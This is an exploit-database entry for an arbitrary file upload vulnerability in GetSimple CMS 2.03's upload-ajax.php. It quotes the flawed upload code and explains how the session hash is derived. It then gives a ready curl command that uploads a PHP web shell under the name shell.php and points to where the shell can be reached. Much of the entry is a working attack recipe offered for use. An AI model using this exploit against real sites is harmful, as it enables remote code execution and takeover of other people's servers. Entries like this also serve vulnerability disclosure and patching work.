Getsimple CMS 2.03 - 'upload-ajax.php' Arbitrary File Upload

EKU-ID: 39984	CVE:	OSVDB-ID:
Author: s3rg3770 & Chuzz	Published: 2011-02-15	Verified:
Download:

Rating

☆☆☆☆☆

source: https://www.securityfocus.com/bid/46427/info

GetSimple CMS is prone to an arbitrary-file-upload vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

GetSimple CMS 2.03 is vulnerable; other versions may also be affected.

Bug Code:
getsimple/admin/upload-ajax.php

if ($_REQUEST[&#039;sessionHash&#039;] === $SESSIONHASH) {
if (!empty($_FILES))
{
$tempFile = $_FILES[&#039;Filedata&#039;][&#039;tmp_name&#039;];
$name = clean_img_name($_FILES[&#039;Filedata&#039;][&#039;name&#039;]);
$targetPath = GSDATAUPLOADPATH;
$targetFile = str_replace(‘//’,&#039;/’,$targetPath) . $name;
move_uploaded_file($tempFile, $targetFile);
----------------------------------------------------------------------

Generating SESSIONHASH: md5( $salt. $sitename)
[XPL]

curl -F “Filedata=@yourshell.txt;filename=shell.php”
http://getsimple_localhost/admin/upload-ajax.php\?sessionHash\=HASH CREATO

After, enjoy your Bacon-Shell here ...http://getsimple_localhost/
data/uploads/shell.php